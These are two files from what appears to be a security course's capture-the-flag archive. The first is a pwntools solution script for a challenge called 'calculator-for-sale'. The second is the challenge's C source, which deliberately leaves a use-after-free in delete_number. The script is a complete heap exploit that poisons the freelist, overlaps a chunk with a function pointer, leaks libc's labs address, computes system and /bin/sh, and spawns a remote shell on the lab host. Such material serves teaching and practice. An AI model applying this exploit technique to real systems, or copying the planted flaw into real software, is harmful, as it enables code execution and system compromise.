File: solutions/calculator-for-sale/calculator-for-sale.py
from pwn import *


r = remote("10.0.10.10", 5010)
context.log_level = "DEBUG"

INDEX_REQUEST = "Please specify an index.\n> "

STATE = 0x6020A0

def get_menu():
    r.recvuntil(" 6. Exit.\n");

def make_number(index, num, name):
    r.sendline("1")
    r.recvuntil(INDEX_REQUEST)
    r.sendline(str(index))
    r.recvuntil("OK, send a number.\n> ")
    r.sendline(str(num))
    r.recvuntil("OK, send a name.\n> ")
    r.sendline(str(name))
    get_menu()

def change_number(index, num):
    r.sendline("2")
    r.recvuntil(INDEX_REQUEST)
    r.sendline(str(index))
    r.recvuntil("OK, send a number to fill ")
    r.sendline(str(num))
    get_menu()

def switch_function(func):
    r.sendline("3")
    r.recvuntil(" 4. abs\n> ")
    r.sendline(str(func))
    get_menu()

def call_function(op1, op2, wait=True):
    r.sendline("4")
    r.recvuntil(INDEX_REQUEST)
    r.sendline(str(op1))
    r.recvuntil(INDEX_REQUEST)
    r.sendline(str(op2))
    r.recvuntil("OK, calling . . .\n")
    if not wait:
        return None, None
    res = int(re.match(r"The result was '(\d+)'.", r.recvline()).group(1))
    count = int(re.match(r"You have now performed '(\d+)' operations.", r.recvline()).group(1))
    get_menu()
    return res, count

def delete_number(index):
    r.sendline("5")
    r.recvuntil(INDEX_REQUEST)
    r.sendline(str(index))
    get_menu()

def exit():
    r.sendline("6")

get_menu()

# Create victim chunk
make_number(0, 0, "victim")
# Free it
delete_number(0)
# Overwrite the fwd pointer to point to current_op
change_number(0, STATE + 0x60)

# Wait until we have 0x21 usages
while True:
    _, c = call_function(0, 0)
    if c >= 0x21:
        break

# Skip the legitimate chunk on the freelist (where index 0 points)
make_number(1, 1, "binsh") # will later be filled in with /bin/sh pointer
# This one will overlap with current_op
make_number(2, 2, "over")

# Switch to labs function
switch_function(4)

# Call labs with a pointer to labs (print the address of labs)
labs, _ = call_function(2, 0) # op2 doesn't matter

# Calculate pointers to good things!
system = labs + 0xbb50
binsh = labs + 0x1705aa

print "system at:", hex(system)
print "/bin/sh at:", hex(binsh)

# Fill in /bin/sh pointer
change_number(1, binsh)
# Overwrite function pointer
change_number(2, system)

# Call system with pointer to /bin/sh
call_function(1, 0, wait=False) # op2 doesn't matter

# Shell!
r.interactive()

File: past-classes/2018-fall/challenges/calculator-for-sale/calculator-for-sale.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <memory.h>

#define ARRAY_SIZE 11

/* Define "string_user" to be the type `int function(long, long)` */
typedef long (string_user)(long, long);

/* Define number holder */
typedef struct _number_t {
  long num;
  char name[8];
} number_t;

typedef struct _state_t {
  /* Define an array of string pointers */
  number_t *number_storage[ARRAY_SIZE];
  /* Keep track of how many operations have been performed. */
  long ops_performed;
  /* Define a pointer to the current function in use */
  string_user *current_op;
} state_t;

state_t state;

/* functions that can take strings */

long add(long op1, long op2) {
  return op1 + op2;
}

long mul(long op1, long op2) {
  return op1 * op2;
}

long divide(long op1, long op2) {
  if (op2 == 0) {
    exit(1);
  }
  return op1 / op2;
}

/* User interaction functions */

void prompt() {
  printf("> ");
}

long get_num() {
  char buf[32];
  prompt();
  fgets(buf, 32, stdin);
  return strtol(buf, NULL, 10);
}

int get_index() {
  int index;

  puts("Please specify an index.");
  index = get_num();

  if (index < 0 || index >= ARRAY_SIZE) {
    puts("That index isn't valid . . .");
    exit(1);
  }

  return index;
}

void make_number() {
  int index = get_index();

  if (state.number_storage[index] != NULL) {
    puts("That index is already taken!");
    exit(1);
  }

  state.number_storage[index] = malloc(sizeof(number_t));

  puts("OK, send a number.");
  prompt();
  state.number_storage[index]->num = get_num();

  puts("OK, send a name.");
  prompt();
  fgets(state.number_storage[index]->name, 8, stdin);
}

void change_number() {
  int index = get_index();

  if (state.number_storage[index] == NULL) {
    puts("That index hasn't been filled!");
    exit(1);
  }

  printf("OK, send a number to fill '%s'.\n", state.number_storage[index]->name);
  prompt();
  state.number_storage[index]->num = get_num();
}

void switch_function() {
  puts("Please select:");
  puts(" 1. add");
  puts(" 2. mul");
  puts(" 3. div");
  puts(" 4. abs");

  switch (get_num()) {
    case 1:
      state.current_op = add;
      break;
    case 2:
      state.current_op = mul;
      break;
    case 3:
      state.current_op = divide;
      break;
    case 4:
      state.current_op = labs;
      break;
    default:
      puts("That's not a valid function!");
      exit(1);
  }
}

void call_function() {
  int op1_index;
  int op2_index;
  long res;

  puts("Which operands would you like to use?");
  op1_index = get_index();

  if (state.number_storage[op1_index] == NULL) {
    puts("That index hasn't been filled!");
    exit(1);
  }

  op2_index = get_index();

  if (state.number_storage[op2_index] == NULL) {
    puts("That index hasn't been filled!");
    exit(1);
  }

  puts("OK, calling . . .");
  res = state.current_op(state.number_storage[op1_index]->num, state.number_storage[op2_index]->num);
  printf("The result was '%ld'.\n", res);

  state.ops_performed++;
  printf("You have now performed '%ld' operations.\n", state.ops_performed);
}

void delete_number() {
  int index = get_index();

  if (state.number_storage[index] == NULL) {
    puts("That index hasn't been filled!");
    exit(1);
  }

  free(state.number_storage[index]);

  /* TODO: NULL out this entry in the array. */
}

int main() {
  int option;

  memset(state.number_storage, 0, sizeof(state.number_storage));

  puts("Welcome!");

  state.ops_performed = 0;
  state.current_op = add;

  while (1) {
    puts("Please select:");
    puts(" 1. Create a new number.");
    puts(" 2. Change a number.");
    puts(" 3. Switch function.");
    puts(" 4. Call function.");
    puts(" 5. Delete a number.");
    puts(" 6. Exit.");

    option = get_num();

    switch (option) {
      case 1:
        make_number();
        break;
      case 2:
        change_number();
        break;
      case 3:
        switch_function();
        break;
      case 4:
        call_function();
        break;
      case 5:
        delete_number();
        break;
      default:
        exit(0);
    }
  }

  return 0;
}
